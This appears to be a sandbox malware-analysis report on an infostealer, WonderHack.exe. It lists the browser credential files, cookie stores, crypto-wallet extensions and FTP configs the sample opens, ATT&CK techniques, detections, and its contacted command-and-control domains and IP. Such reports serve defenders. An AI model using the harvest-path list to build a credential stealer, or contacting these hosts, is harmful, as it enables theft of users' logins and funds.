Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\WonderHack.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\WonderHack.exe; Directory queried: C:\Users\user\Documents\HTAGVDFUIE
Source: C:\Users\user\Desktop\WonderHack.exe; Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\Desktop\WonderHack.exe; Directory queried: C:\Users\user\Documents\KATAXZVCPS
Source: C:\Users\user\Desktop\WonderHack.exe; Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: Yara match; File source: 00000002.00000003.2527201915.0000000000F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: WonderHack.exe PID: 3696, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match; File source: Process Memory Space: WonderHack.exe PID: 3696, type: MEMORYSTR
Source: Yara match; File source: 2.2.WonderHack.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.WonderHack.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix, listed by tactic column (the report's numeric markers are shown in parentheses after the technique they precede):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (2); Native API (1); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (211); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (11); Process Injection (211); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: System Time Discovery (1); Security Software Discovery (141); Virtualization/Sandbox Evasion (11); Process Discovery (1); File and Directory Discovery (11); System Information Discovery (33)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Local System (41); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detection (Source / Detection / Scanner / Label):
WonderHack.exe / 38% / Virustotal
WonderHack.exe / 29% / ReversingLabs / Win32.Infostealer.Generic
WonderHack.exe / 100% / Joe Sandbox ML
No Antivirus matches
Contacted Domains
(no Antivirus Detection entry for any row)

Name | IP | Active | Malicious | Reputation
sendypaster.xyz | 193.143.1.9 | true | true | unknown
steamcommunity.com | 23.55.153.106 | true | false | high
lev-tolstoi.com | 104.21.66.86 | true | false | high
steppriflej.xyz | 193.143.1.9 | true | true | unknown
supporse-comment.cyou | unknown | unknown | true | unknown
ripe-blade.cyou | unknown | unknown | true | unknown
greywe-snotty.cyou | unknown | unknown | true | unknown
hosue-billowy.cyou | unknown | unknown | true | unknown
bellflamre.click | unknown | unknown | false | high
smash-boiling.cyou | unknown | unknown | true | unknown
pollution-raker.cyou | unknown | unknown | true | unknown
Contacted URLs
(no Antivirus Detection entry for any row)

Name | Malicious | Reputation
sendypaster.xyz | true | unknown
steppriflej.xyz | true | unknown
smash-boiling.cyou | true | unknown
https://steamcommunity.com/profiles/76561199724331900 | false | high
ripe-blade.cyou | true | unknown
https://lev-tolstoi.com/api | false | high
greywe-snotty.cyou | true | unknown
supporse-comment.cyou | true | unknown
hosue-billowy.cyou | true | unknown
bellflamre.click | true | unknown

Note: the Malicious and Reputation columns are reputation-lookup results, not verdicts of this analysis. lev-tolstoi.com is rated false/high in both tables even though the sample contacts https://lev-tolstoi.com/api, and bellflamre.click is rated false/high as a domain but true/unknown as a URL. Every domain in these tables except the shared platform steamcommunity.com, plus 193.143.1.9 (shared by sendypaster.xyz and steppriflej.xyz), is a usable block indicator; the steamcommunity.com profile URL is a hunt indicator rather than a reason to block the platform.
URLs from Memory and Binary Data
(no Antivirus Detection entry for any row; the memory dumps each string was carved from are listed beneath it)

Name | Malicious | Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://duckduckgo.com/chrome_newtab | false | high
  Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp
https://player.vimeo.com | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://duckduckgo.com/ac/?q= | false | high
  Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://steamcommunity.com/?subsection=broadcasts | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/HU~ | false | high
  Source: WonderHack.exe, 00000002.00000003.2527263074.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532232865.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | false | high
  Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
https://store.steampowered.com/subscriber_agreement/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://www.gstatic.cn/recaptcha/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://login.s | false | unknown
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp
http://www.valvesoftware.com/legal.htm | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://www.youtube.com | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://www.google.com | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://lev-tolstoi.com/sY | false | unknown
  Source: WonderHack.exe, 00000002.00000003.2532389602.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2527201915.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2532196517.0000000000F51000.00000004.00000020.00020000.00000000.sdmp
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | false | high
  Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmp
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp
https://lev-tolstoi.com/sH | false | unknown
  Source: WonderHack.exe, 00000002.00000003.2477331770.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2477650404.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453432872.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453505070.00000000032ED000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453622723.00000000032EE000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2453716881.00000000032EE000.00000004.00000800.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | false | high
  Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://lev-tolstoi.com/i | false | unknown
  Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://s.ytimg.com; | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.stP | false | unknown
  Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
https://steam.tv/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp
http://store.steampowered_ | false | unknown
  Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://lev-tolstoi.com/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000002.2585120871.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2573454494.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp
http://store.steampowered.com/privacy_agreement/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://lev-tolstoi.com/api6M | false | unknown
  Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000EED000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp
https://store.steampowered.com/points/shop/ | false | high
  Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | false | high
  Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp
http://crl.rootca1.amazontrust.com/rootca1.crl0 | false | high
  Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp
http://ocsp.rootca1.amazontrust.com0: | false | high
  Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | false | high
